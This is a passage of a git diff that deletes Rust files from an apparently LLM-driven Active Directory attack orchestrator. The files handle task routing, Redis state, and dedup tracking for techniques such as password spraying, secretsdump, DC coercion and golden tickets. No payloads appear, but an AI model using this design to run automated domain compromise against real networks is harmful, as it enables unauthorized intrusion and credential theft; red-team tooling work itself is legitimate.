- continue; - } - } - Err(e) => { - consecutive_failures += 1; - let is_conn = is_connection_error(&e); - - if is_conn { - let delay = Duration::from_secs(std::cmp::min( - 60, - 2_u64.pow(consecutive_failures.min(5)), - )); - - if consecutive_failures >= 10 { - error!( - attempt = consecutive_failures, - err = %e, - "Result consumer: Redis unavailable for extended period, still retrying" - ); - } else { - warn!( - attempt = consecutive_failures, - err = %e, - delay_secs = delay.as_secs(), - "Result consumer: connection error, retrying" - ); - } - - tokio::select! { - _ = tokio::time::sleep(delay) => {}, - _ = shutdown.changed() => { - info!("Result consumer shutting down (signalled during backoff)"); - break; - } - } - continue; - } else { - warn!(err = %e, "Result consumer non-connection error"); - } - } - } - - // Normal pace — sleep between polls - tokio::select! { - _ = tokio::time::sleep(poll_interval) => {}, - _ = shutdown.changed() => { - info!("Result consumer shutting down (signalled during sleep)"); - break; - } - } - } - - info!("Result consumer stopped"); - }); - - (handle, rx) -} - -/// One polling cycle: check all tracked tasks for results. -async fn consume_cycle( - queue: &TaskQueue, - tracker: &ActiveTaskTracker, - tx: &mpsc::Sender<CompletedTask>, -) -> Result<usize> { - let task_ids = tracker.task_ids().await; - if task_ids.is_empty() { - return Ok(0); - } - - let results = queue - .check_results_batch(&task_ids) - .await - .inspect_err(|e| warn!(tracked = task_ids.len(), err = %e, "check_results_batch failed"))?; - - let mut found = 0_usize; - for (task_id, maybe_result) in results { - if let Some(result) = maybe_result { - // Remove from tracker - tracker.remove(&task_id).await; - - // Send to main loop - let completed = CompletedTask { - task_id: task_id.clone(), - result, - }; - if tx.send(completed).await.is_err() { - // Main loop dropped the receiver — shutting down - info!("Result channel closed, stopping consumer"); - break; - } - found += 1; - } - } - - Ok(found) -} - -/// Heuristic to identify Redis connection errors. -fn is_connection_error(e: &anyhow::Error) -> bool { - let msg = e.to_string().to_lowercase(); - [ - "connection", - "connect", - "closed", - "timeout", - "broken pipe", - "reset", - "refused", - "sentinel", - ] - .iter() - .any(|kw| msg.contains(kw)) -} diff --git a/ares-orchestrator/src/routing.rs b/ares-orchestrator/src/routing.rs deleted file mode 100644 index 5291fa62..00000000 --- a/ares-orchestrator/src/routing.rs +++ /dev/null @@ -1,258 +0,0 @@ -//! Task routing — decides which agent queue receives a task. -//! -//! Mirrors the Python `ares.core.dispatcher.routing.RoutingMixin` logic: -//! route by role, respect per-role concurrency limits, track active tasks. - -use std::collections::HashMap; -use std::sync::Arc; - -use tokio::sync::Mutex; - -// --------------------------------------------------------------------------- -// Active-task tracker (shared across routing + monitoring + throttling) -// --------------------------------------------------------------------------- - -/// Per-role tracking of in-flight tasks. -#[derive(Debug, Clone)] -pub struct ActiveTask { - pub task_id: String, - pub task_type: String, - pub role: String, - pub submitted_at: std::time::Instant, -} - -/// Thread-safe tracker for all in-flight tasks.
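///
/// Usage sketch (doc example added for clarity; mirrors the tests below):
///
/// ```ignore
/// let tracker = ActiveTaskTracker::new();
/// tracker.add(ActiveTask {
///     task_id: "t1".into(),
///     task_type: "recon".into(),
///     role: "recon".into(),
///     submitted_at: std::time::Instant::now(),
/// }).await;
/// assert_eq!(tracker.count_for_role("recon").await, 1);
/// tracker.remove("t1").await; // count drops back to 0
/// ```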
-#[derive(Debug, Clone)] -pub struct ActiveTaskTracker { - inner: Arc<Mutex<TrackerInner>>, -} - -#[derive(Debug, Default)] -struct TrackerInner { - /// task_id -> ActiveTask - tasks: HashMap<String, ActiveTask>, - /// role -> count of active tasks - role_counts: HashMap<String, usize>, -} - -impl Default for ActiveTaskTracker { - fn default() -> Self { - Self::new() - } -} - -impl ActiveTaskTracker { - pub fn new() -> Self { - Self { - inner: Arc::new(Mutex::new(TrackerInner::default())), - } - } - - /// Register a newly submitted task. - pub async fn add(&self, task: ActiveTask) { - let mut inner = self.inner.lock().await; - *inner.role_counts.entry(task.role.clone()).or_insert(0) += 1; - inner.tasks.insert(task.task_id.clone(), task); - } - - /// Remove a completed/failed task. Returns the task if it was tracked. - pub async fn remove(&self, task_id: &str) -> Option<ActiveTask> { - let mut inner = self.inner.lock().await; - if let Some(task) = inner.tasks.remove(task_id) { - if let Some(count) = inner.role_counts.get_mut(&task.role) { - *count = count.saturating_sub(1); - } - Some(task) - } else { - None - } - } - - /// Number of active tasks for a role. - pub async fn count_for_role(&self, role: &str) -> usize { - let inner = self.inner.lock().await; - inner.role_counts.get(role).copied().unwrap_or(0) - } - - /// Total number of active LLM-consuming tasks (excludes `crack`, `command`). - pub async fn llm_task_count(&self) -> usize { - let inner = self.inner.lock().await; - inner - .tasks - .values() - .filter(|t| !is_non_llm_task(&t.task_type)) - .count() - } - - /// Total active tasks across all roles. - #[allow(dead_code)] - pub async fn total(&self) -> usize { - let inner = self.inner.lock().await; - inner.tasks.len() - } - - /// Get all tracked task IDs (for result polling). - pub async fn task_ids(&self) -> Vec<String> { - let inner = self.inner.lock().await; - inner.tasks.keys().cloned().collect() - } - - /// Get tasks older than `max_age` that have not received a result. - pub async fn stale_tasks(&self, max_age: std::time::Duration) -> Vec<ActiveTask> { - let inner = self.inner.lock().await; - let cutoff = std::time::Instant::now() - max_age; - inner - .tasks - .values() - .filter(|t| t.submitted_at < cutoff) - .cloned() - .collect() - } -} - -/// Task types that do not consume LLM tokens.
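/// These bypass the LLM-task throttle: `llm_task_count()` above filters them
/// out, so e.g. `is_non_llm_task("crack") == true` while
/// `is_non_llm_task("recon") == false` (see the tests below).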
-const NON_LLM_TYPES: &[&str] = &["crack", "command"]; - -pub fn is_non_llm_task(task_type: &str) -> bool { - NON_LLM_TYPES.contains(&task_type) -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn non_llm_task_classification() { - assert!(is_non_llm_task("crack")); - assert!(is_non_llm_task("command")); - assert!(!is_non_llm_task("recon")); - assert!(!is_non_llm_task("exploit")); - assert!(!is_non_llm_task("privesc_enumeration")); - assert!(!is_non_llm_task("")); - } - - #[tokio::test] - async fn tracker_add_remove() { - let tracker = ActiveTaskTracker::new(); - assert_eq!(tracker.total().await, 0); - - tracker - .add(ActiveTask { - task_id: "t1".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - - assert_eq!(tracker.total().await, 1); - assert_eq!(tracker.count_for_role("recon").await, 1); - assert_eq!(tracker.count_for_role("lateral").await, 0); - - let removed = tracker.remove("t1").await; - assert!(removed.is_some()); - assert_eq!(tracker.total().await, 0); - assert_eq!(tracker.count_for_role("recon").await, 0); - } - - #[tokio::test] - async fn tracker_remove_nonexistent() { - let tracker = ActiveTaskTracker::new(); - assert!(tracker.remove("nonexistent").await.is_none()); - } - - #[tokio::test] - async fn llm_count_excludes_non_llm() { - let tracker = ActiveTaskTracker::new(); - - for (id, task_type, role) in [ - ("t1", "recon", "recon"), - ("t2", "crack", "cracker"), - ("t3", "command", "lateral"), - ("t4", "exploit", "privesc"), - ] { - tracker - .add(ActiveTask { - task_id: id.into(), - task_type: task_type.into(), - role: role.into(), - submitted_at: std::time::Instant::now(), - }) - .await; - } - - assert_eq!(tracker.total().await, 4); - assert_eq!(tracker.llm_task_count().await, 2); // recon + exploit - } - - #[tokio::test] - async fn stale_tasks_detection() { - let tracker = ActiveTaskTracker::new(); - - tracker - .add(ActiveTask { - task_id: "old".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now() - std::time::Duration::from_secs(120), - }) - .await; - - tracker - .add(ActiveTask { - task_id: "new".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - - let stale = tracker - .stale_tasks(std::time::Duration::from_secs(60)) - .await; - assert_eq!(stale.len(), 1); - assert_eq!(stale[0].task_id, "old"); - } - - #[tokio::test] - async fn task_ids_collected() { - let tracker = ActiveTaskTracker::new(); - tracker - .add(ActiveTask { - task_id: "a".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - tracker - .add(ActiveTask { - task_id: "b".into(), - task_type: "exploit".into(), - role: "privesc".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - - let mut ids = tracker.task_ids().await; - ids.sort(); - assert_eq!(ids, vec!["a", "b"]); - } - - #[tokio::test] - async fn role_count_saturating_sub() { - let tracker = ActiveTaskTracker::new(); - // Double-remove shouldn't panic or underflow - tracker - .add(ActiveTask { - task_id: "t1".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - tracker.remove("t1").await; - tracker.remove("t1").await; // second remove returns None - assert_eq!(tracker.count_for_role("recon").await, 0); - } -} diff --git a/ares-orchestrator/src/state/dedup.rs b/ares-orchestrator/src/state/dedup.rs deleted file 
mode 100644 index 7e8112fe..00000000 --- a/ares-orchestrator/src/state/dedup.rs +++ /dev/null @@ -1,69 +0,0 @@ -//! Dedup persistence — mark_exploited, persist_dedup, persist_mssql. - -use anyhow::Result; -use redis::AsyncCommands; - -use ares_core::state; - -use super::SharedState; -use crate::task_queue::TaskQueue; - -impl SharedState { - /// Mark a vulnerability as exploited. - pub async fn mark_exploited(&self, queue: &TaskQueue, vuln_id: &str) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_EXPLOITED - ); - let mut conn = queue.connection(); - let _: () = conn.sadd(&key, vuln_id).await?; - let _: () = conn.expire(&key, 86400).await?; - - let mut state = self.inner.write().await; - state.exploited_vulnerabilities.insert(vuln_id.to_string()); - Ok(()) - } - - /// Persist a dedup set entry to Redis. - pub async fn persist_dedup(&self, queue: &TaskQueue, set_name: &str, key: &str) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let redis_key = format!( - "{}:{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DEDUP_PREFIX, - set_name - ); - let mut conn = queue.connection(); - let _: () = conn.sadd(&redis_key, key).await?; - let _: () = conn.expire(&redis_key, 86400).await?; - Ok(()) - } - - /// Persist MSSQL enum dispatched entry to Redis. - pub async fn persist_mssql_dispatched(&self, queue: &TaskQueue, ip: &str) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let redis_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_MSSQL_ENUM_DISPATCHED - ); - let mut conn = queue.connection(); - let _: () = conn.sadd(&redis_key, ip).await?; - let _: () = conn.expire(&redis_key, 86400).await?; - Ok(()) - } -} diff --git a/ares-orchestrator/src/state/inner.rs b/ares-orchestrator/src/state/inner.rs deleted file mode 100644 index 9247675f..00000000 --- a/ares-orchestrator/src/state/inner.rs +++ /dev/null @@ -1,377 +0,0 @@ -//! StateInner — the actual mutable state backing SharedState. - -use std::collections::{HashMap, HashSet}; - -use chrono::{DateTime, Utc}; - -use ares_core::models::*; - -use super::ALL_DEDUP_SETS; - -/// Lockout quarantine duration: 5 minutes matches S4U cooldown and typical -/// AD lockout observation windows. Longer values block the critical path. -const QUARANTINE_DURATION_SECS: i64 = 300; - -#[derive(Debug)] -pub struct StateInner { - pub operation_id: String, - pub target: Option<String>, - pub target_ips: Vec<String>, - - // Collections (append-mostly) - pub credentials: Vec<Credential>, - pub hashes: Vec<Hash>, - pub hosts: Vec<Host>, - pub users: Vec<User>, - pub shares: Vec<Share>, - pub domains: Vec<String>, - - // Vulnerability tracking - pub discovered_vulnerabilities: HashMap<String, VulnerabilityInfo>, - pub exploited_vulnerabilities: HashSet<String>, - - // Maps - pub domain_controllers: HashMap<String, String>, - pub netbios_to_fqdn: HashMap<String, String>, - pub domain_sids: HashMap<String, String>, - /// RID-500 account name per domain (may differ from "Administrator" if renamed).
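/// e.g. `{"contoso.local" => "corp_admin"}` (hypothetical renamed RID-500 account).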
- pub admin_names: HashMap<String, String>, - - // Trust relationships (domain FQDN → trust metadata) - pub trusted_domains: HashMap<String, TrustInfo>, - - // Per-domain DA tracking: domains where krbtgt NTLM has been obtained - pub dominated_domains: HashSet<String>, - - // Flags - pub has_domain_admin: bool, - pub has_golden_ticket: bool, - pub domain_admin_path: Option<String>, - - // Dedup sets (persisted to Redis) - pub dedup: HashMap<String, HashSet<String>>, - - // MSSQL enum tracking (persisted to Redis SET) - pub mssql_enum_dispatched: HashSet<String>, - - // ACL chain data (from BloodHound, stored in Redis LIST) - pub acl_chains: Vec<serde_json::Value>, - - // ACL step dedup (tracks which chain steps have been dispatched) - pub dispatched_acl_steps: HashSet<String>, - - // Pending/completed tasks (persisted to Redis HASHes) - pub pending_tasks: HashMap<String, TaskInfo>, - pub completed_tasks: HashMap<String, crate::task_queue::TaskResult>, - - // Credential lockout quarantine: `user@domain` → expiry time. - // Credentials that triggered STATUS_ACCOUNT_LOCKED_OUT or - // KDC_ERR_CLIENT_REVOKED are quarantined to avoid burning auth budget. - pub quarantined_credentials: HashMap<String, DateTime<Utc>>, - - // Completion flag (set externally to signal operation should wrap up) - pub completed: bool, -} - -impl StateInner { - pub(super) fn new(operation_id: String) -> Self { - let mut dedup = HashMap::new(); - for name in ALL_DEDUP_SETS { - dedup.insert(name.to_string(), HashSet::new()); - } - - Self { - operation_id, - target: None, - target_ips: Vec::new(), - credentials: Vec::new(), - hashes: Vec::new(), - hosts: Vec::new(), - users: Vec::new(), - shares: Vec::new(), - domains: Vec::new(), - discovered_vulnerabilities: HashMap::new(), - exploited_vulnerabilities: HashSet::new(), - domain_controllers: HashMap::new(), - netbios_to_fqdn: HashMap::new(), - domain_sids: HashMap::new(), - admin_names: HashMap::new(), - trusted_domains: HashMap::new(), - dominated_domains: HashSet::new(), - has_domain_admin: false, - has_golden_ticket: false, - domain_admin_path: None, - dedup, - mssql_enum_dispatched: HashSet::new(), - acl_chains: Vec::new(), - dispatched_acl_steps: HashSet::new(), - pending_tasks: HashMap::new(), - completed_tasks: HashMap::new(), - quarantined_credentials: HashMap::new(), - completed: false, - } - } - - /// Check if a username is the delegating account for a constrained - /// delegation or RBCD vulnerability. These accounts must be reserved - /// for S4U exploitation — spraying or secretsdump with their creds - /// causes lockout before S4U can use them. - pub fn is_delegation_account(&self, username: &str) -> bool { - let u = username.to_lowercase(); - self.discovered_vulnerabilities.values().any(|vuln| { - let vtype = vuln.vuln_type.to_lowercase(); - if vtype != "constrained_delegation" && vtype != "rbcd" { - return false; - } - vuln.details - .get("account_name") - .or_else(|| vuln.details.get("AccountName")) - .and_then(|v| v.as_str()) - .map(|a| a.to_lowercase() == u) - .unwrap_or(false) - }) - } - - /// Check if a credential is quarantined due to lockout. - /// Expired quarantines are ignored (lazy cleanup). - pub fn is_credential_quarantined(&self, username: &str, domain: &str) -> bool { - let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); - self.quarantined_credentials - .get(&key) - .map(|expiry| Utc::now() < *expiry) - .unwrap_or(false) - } - - /// Quarantine a credential for `QUARANTINE_DURATION_SECS` after lockout.
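///
/// Sketch (doc example added for clarity):
///
/// ```ignore
/// state.quarantine_credential("jdoe", "contoso.local");
/// assert!(state.is_credential_quarantined("jdoe", "contoso.local"));
/// // ...the quarantine lapses 300 seconds later (lazy cleanup on read).
/// ```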
- pub fn quarantine_credential(&mut self, username: &str, domain: &str) { - let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); - let expiry = Utc::now() + chrono::Duration::seconds(QUARANTINE_DURATION_SECS); - self.quarantined_credentials.insert(key, expiry); - } - - /// Check if a dedup key exists in the named set. - pub fn is_processed(&self, set_name: &str, key: &str) -> bool { - self.dedup - .get(set_name) - .map(|s| s.contains(key)) - .unwrap_or(false) - } - - /// Check if any key in the named dedup set starts with `prefix`. - pub fn has_processed_prefix(&self, set_name: &str, prefix: &str) -> bool { - self.dedup - .get(set_name) - .map(|s| s.iter().any(|k| k.starts_with(prefix))) - .unwrap_or(false) - } - - /// Mark a key as processed in the named set. - pub fn mark_processed(&mut self, set_name: &str, key: String) { - self.dedup - .entry(set_name.to_string()) - .or_default() - .insert(key); - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::state::*; - - #[test] - fn test_state_inner_new_initializes_all_dedup_sets() { - let state = StateInner::new("op-test".into()); - assert_eq!(state.operation_id, "op-test"); - assert!(!state.has_domain_admin); - assert!(!state.has_golden_ticket); - assert!(!state.completed); - - // All 22 dedup sets should be initialized - for name in ALL_DEDUP_SETS { - assert!(state.dedup.contains_key(*name), "Missing dedup set: {name}"); - assert!(state.dedup[*name].is_empty()); - } - assert_eq!(state.dedup.len(), ALL_DEDUP_SETS.len()); - } - - #[test] - fn test_is_processed_returns_false_for_unknown_set() { - let state = StateInner::new("op-1".into()); - assert!(!state.is_processed("nonexistent_set", "key1")); - } - - #[test] - fn test_mark_processed_and_is_processed() { - let mut state = StateInner::new("op-1".into()); - assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); - - state.mark_processed(DEDUP_CRACK_REQUESTS, "hash1".into()); - assert!(state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); - assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "hash2")); - } - - #[test] - fn test_mark_processed_creates_new_set_if_needed() { - let mut state = StateInner::new("op-1".into()); - state.mark_processed("custom_set", "key1".into()); - assert!(state.is_processed("custom_set", "key1")); - } - - #[test] - fn test_mark_processed_idempotent() { - let mut state = StateInner::new("op-1".into()); - state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); - state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); - assert_eq!(state.dedup[DEDUP_SECRETSDUMP].len(), 1); - } - - #[test] - fn test_dedup_sets_are_independent() { - let mut state = StateInner::new("op-1".into()); - state.mark_processed(DEDUP_CRACK_REQUESTS, "hash1".into()); - state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.10".into()); - - assert!(state.is_processed(DEDUP_CRACK_REQUESTS, "hash1")); - assert!(!state.is_processed(DEDUP_CRACK_REQUESTS, "192.168.58.10")); - assert!(state.is_processed(DEDUP_SECRETSDUMP, "192.168.58.10")); - assert!(!state.is_processed(DEDUP_SECRETSDUMP, "hash1")); - } - - #[test] - fn test_exploited_vulnerabilities_tracking() { - let mut state = StateInner::new("op-1".into()); - assert!(state.exploited_vulnerabilities.is_empty()); - - state - .exploited_vulnerabilities - .insert("vuln-001".to_string()); - assert!(state.exploited_vulnerabilities.contains("vuln-001")); - assert!(!state.exploited_vulnerabilities.contains("vuln-002")); - } - - #[test] - fn test_mssql_enum_dispatched_tracking() { - let mut state =
StateInner::new("op-1".into()); - assert!(!state.mssql_enum_dispatched.contains("192.168.58.20")); - - state - .mssql_enum_dispatched - .insert("192.168.58.20".to_string()); - assert!(state.mssql_enum_dispatched.contains("192.168.58.20")); - } - - #[test] - fn test_domain_controller_map() { - let mut state = StateInner::new("op-1".into()); - state - .domain_controllers - .insert("contoso.local".into(), "192.168.58.10".into()); - state - .domain_controllers - .insert("fabrikam.local".into(), "192.168.58.20".into()); - - assert_eq!( - state.domain_controllers.get("contoso.local"), - Some(&"192.168.58.10".to_string()) - ); - assert_eq!( - state.domain_controllers.get("fabrikam.local"), - Some(&"192.168.58.20".to_string()) - ); - assert_eq!(state.domain_controllers.get("unknown.local"), None); - } - - #[test] - fn test_all_known_dedup_set_constants() { - // Verify constants are accessible and match expected names - let expected = vec![ - DEDUP_CRACK_REQUESTS, - DEDUP_SECRETSDUMP, - DEDUP_DELEGATION_CREDS, - DEDUP_ADCS_SERVERS, - DEDUP_BLOODHOUND_DOMAINS, - DEDUP_SPIDERED_SHARES, - DEDUP_EXPANSION_CREDS, - DEDUP_ASREP_DOMAINS, - DEDUP_USERNAME_SPRAY, - DEDUP_PASSWORD_SPRAY, - DEDUP_ESC8_SERVERS, - DEDUP_COERCED_DCS, - DEDUP_WRITABLE_SHARES, - DEDUP_HASH_LATERAL, - DEDUP_SCANNED_TARGETS, - DEDUP_ACL_STEPS, - DEDUP_TRUST_FOLLOW, - DEDUP_S4U_EXPLOITS, - DEDUP_GMSA_ACCOUNTS, - DEDUP_LOW_HANGING, - DEDUP_CRED_SECRETSDUMP, - DEDUP_SHARE_ENUM, - ]; - assert_eq!(expected.len(), ALL_DEDUP_SETS.len()); - for name in expected { - assert!( - ALL_DEDUP_SETS.contains(&name), - "Missing from ALL_DEDUP_SETS: {name}" - ); - } - } - - #[test] - fn test_is_delegation_account() { - let mut state = StateInner::new("op-1".into()); - assert!(!state.is_delegation_account("john.smith")); - - // Add a constrained delegation vuln for john.smith - let mut details = std::collections::HashMap::new(); - details.insert("account_name".to_string(), serde_json::json!("john.smith")); - state.discovered_vulnerabilities.insert( - "constrained_delegation_john.smith".into(), - ares_core::models::VulnerabilityInfo { - vuln_id: "constrained_delegation_john.smith".into(), - vuln_type: "constrained_delegation".into(), - target: "".into(), - discovered_by: "".into(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: "".into(), - priority: 8, - }, - ); - - assert!(state.is_delegation_account("john.smith")); - assert!(state.is_delegation_account("John.Smith")); // case insensitive - assert!(!state.is_delegation_account("sam.wilson")); - } - - #[test] - fn test_credential_quarantine() { - let mut state = StateInner::new("op-1".into()); - - // Not quarantined initially - assert!(!state.is_credential_quarantined("jdoe", "child.contoso.local")); - - // Quarantine a credential - state.quarantine_credential("jdoe", "child.contoso.local"); - assert!(state.is_credential_quarantined("jdoe", "child.contoso.local")); - assert!(state.is_credential_quarantined("JDOE", "CHILD.CONTOSO.LOCAL")); // case insensitive - - // Different credential not affected - assert!(!state.is_credential_quarantined("john.smith", "child.contoso.local")); - } - - #[test] - fn test_credential_quarantine_expired() { - let mut state = StateInner::new("op-1".into()); - - // Insert with an already-expired time - let key = "jdoe@child.contoso.local".to_string(); - state - .quarantined_credentials - .insert(key, Utc::now() - chrono::Duration::seconds(1)); - - // Should not be quarantined (expired) - assert!(!state.is_credential_quarantined("jdoe", 
"child.contoso.local")); - } -} diff --git a/ares-orchestrator/src/state/mod.rs b/ares-orchestrator/src/state/mod.rs deleted file mode 100644 index 1fedb6bc..00000000 --- a/ares-orchestrator/src/state/mod.rs +++ /dev/null @@ -1,75 +0,0 @@ -//! In-memory shared state synced with Redis. -//! -//! `SharedState` wraps the operation state in `Arc>` so that all -//! background automation tasks can read state concurrently, and writes -//! (credential publishing, result processing) are serialized. -//! -//! State is loaded from Redis at startup and updated incrementally as results -//! arrive. Dedup sets are persisted to Redis so they survive orchestrator restarts. - -mod dedup; -mod inner; -mod persistence; -mod publishing; -mod shared; - -// Re-export everything that was publicly visible from the old single file. -pub use shared::SharedState; - -// --------------------------------------------------------------------------- -// Dedup set names (match Python `ares:op:{op_id}:dedup:{name}`) -// --------------------------------------------------------------------------- - -pub const DEDUP_CRACK_REQUESTS: &str = "crack_requests"; -pub const DEDUP_SECRETSDUMP: &str = "secretsdump"; -pub const DEDUP_DELEGATION_CREDS: &str = "delegation_creds"; -pub const DEDUP_ADCS_SERVERS: &str = "adcs_servers"; -pub const DEDUP_BLOODHOUND_DOMAINS: &str = "bloodhound_domains"; -pub const DEDUP_SPIDERED_SHARES: &str = "spidered_shares"; -pub const DEDUP_EXPANSION_CREDS: &str = "expansion_creds"; -pub const DEDUP_ASREP_DOMAINS: &str = "asrep_domains"; -pub const DEDUP_USERNAME_SPRAY: &str = "username_spray"; -pub const DEDUP_PASSWORD_SPRAY: &str = "password_spray"; -pub const DEDUP_ESC8_SERVERS: &str = "esc8_servers"; -pub const DEDUP_COERCED_DCS: &str = "coerced_dcs"; -pub const DEDUP_WRITABLE_SHARES: &str = "writable_shares"; -pub const DEDUP_HASH_LATERAL: &str = "hash_lateral"; -pub const DEDUP_SCANNED_TARGETS: &str = "scanned_targets"; -pub const DEDUP_ACL_STEPS: &str = "acl_steps"; -pub const DEDUP_TRUST_FOLLOW: &str = "trust_follow"; -pub const DEDUP_S4U_EXPLOITS: &str = "s4u_exploits"; -pub const DEDUP_GMSA_ACCOUNTS: &str = "gmsa_accounts"; -pub const DEDUP_LOW_HANGING: &str = "low_hanging"; -pub const DEDUP_CRED_SECRETSDUMP: &str = "cred_secretsdump"; -pub const DEDUP_SHARE_ENUM: &str = "share_enum"; - -/// Vuln queue ZSET key suffix. -pub const KEY_VULN_QUEUE: &str = "vuln_queue"; - -/// Discovery list key prefix (NOT under ares:op:). -pub const DISCOVERY_KEY_PREFIX: &str = "ares:discoveries"; - -const ALL_DEDUP_SETS: &[&str] = &[ - DEDUP_CRACK_REQUESTS, - DEDUP_SECRETSDUMP, - DEDUP_DELEGATION_CREDS, - DEDUP_ADCS_SERVERS, - DEDUP_BLOODHOUND_DOMAINS, - DEDUP_SPIDERED_SHARES, - DEDUP_EXPANSION_CREDS, - DEDUP_ASREP_DOMAINS, - DEDUP_USERNAME_SPRAY, - DEDUP_PASSWORD_SPRAY, - DEDUP_ESC8_SERVERS, - DEDUP_COERCED_DCS, - DEDUP_WRITABLE_SHARES, - DEDUP_HASH_LATERAL, - DEDUP_SCANNED_TARGETS, - DEDUP_ACL_STEPS, - DEDUP_TRUST_FOLLOW, - DEDUP_S4U_EXPLOITS, - DEDUP_SHARE_ENUM, - DEDUP_GMSA_ACCOUNTS, - DEDUP_LOW_HANGING, - DEDUP_CRED_SECRETSDUMP, -]; diff --git a/ares-orchestrator/src/state/persistence.rs b/ares-orchestrator/src/state/persistence.rs deleted file mode 100644 index 90363db3..00000000 --- a/ares-orchestrator/src/state/persistence.rs +++ /dev/null @@ -1,330 +0,0 @@ -//! Redis persistence — load_from_redis & refresh_from_redis. 
- -use std::collections::{HashMap, HashSet}; - -use anyhow::{Context, Result}; -use redis::AsyncCommands; -use tracing::{debug, info}; - -use ares_core::state::{self, RedisStateReader}; - -use super::{SharedState, ALL_DEDUP_SETS, DEDUP_ACL_STEPS}; -use crate::task_queue::TaskQueue; - -impl SharedState { - /// Load state from Redis (called at startup). - pub async fn load_from_redis(&self, queue: &TaskQueue) -> Result<()> { - let mut conn = queue.connection(); - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - - let reader = RedisStateReader::new(operation_id.clone()); - - // Load collections - let loaded = reader - .load_state(&mut conn) - .await - .context("Failed to load state from Redis")?; - - let loaded = match loaded { - Some(s) => s, - None => { - info!(operation_id = %operation_id, "No existing state in Redis — starting fresh"); - return Ok(()); - } - }; - - // Load dedup sets - let mut dedup_sets: HashMap<String, HashSet<String>> = HashMap::new(); - for set_name in ALL_DEDUP_SETS { - let key = format!( - "{}:{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DEDUP_PREFIX, - set_name - ); - let members: HashSet<String> = conn.smembers(&key).await.unwrap_or_default(); - if !members.is_empty() { - debug!(set = set_name, count = members.len(), "Loaded dedup set"); - } - dedup_sets.insert(set_name.to_string(), members); - } - - // Load MSSQL enum dispatched - let mssql_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_MSSQL_ENUM_DISPATCHED - ); - let mssql_dispatched: HashSet<String> = conn.smembers(&mssql_key).await.unwrap_or_default(); - - // Load domain SIDs - let domain_sids_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DOMAIN_SIDS - ); - let domain_sids: HashMap<String, String> = - conn.hgetall(&domain_sids_key).await.unwrap_or_default(); - - // Load RID-500 admin account names - let admin_names_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_ADMIN_NAMES - ); - let admin_names: HashMap<String, String> = - conn.hgetall(&admin_names_key).await.unwrap_or_default(); - - // Load trusted domains - let trusted_domains_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_TRUSTED_DOMAINS - ); - let raw_trusts: HashMap<String, String> = - conn.hgetall(&trusted_domains_key).await.unwrap_or_default(); - let mut trusted_domains = HashMap::new(); - for (domain, json_str) in &raw_trusts { - if let Ok(trust) = serde_json::from_str::<ares_core::models::TrustInfo>(json_str) { - trusted_domains.insert(domain.clone(), trust); - } - } - - // Load ACL chains - let acl_chains_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_ACL_CHAINS - ); - let acl_chains_raw: Vec<String> = conn - .lrange(&acl_chains_key, 0, -1) - .await - .unwrap_or_default(); - let acl_chains: Vec<serde_json::Value> = acl_chains_raw - .iter() - .filter_map(|s| serde_json::from_str(s).ok()) - .collect(); - - // Load pending tasks from Redis HASH - let pending_tasks_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_PENDING_TASKS - ); - let raw_pending: std::collections::HashMap<String, String> = - conn.hgetall(&pending_tasks_key).await.unwrap_or_default(); - let mut pending_tasks = std::collections::HashMap::new(); - for (task_id, json_str) in &raw_pending { - if let Ok(task_info) = serde_json::from_str::<ares_core::models::TaskInfo>(json_str) { - pending_tasks.insert(task_id.clone(), task_info); - } - } - - // Load completed tasks from Redis HASH - let completed_tasks_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_COMPLETED_TASKS - ); - let raw_completed:
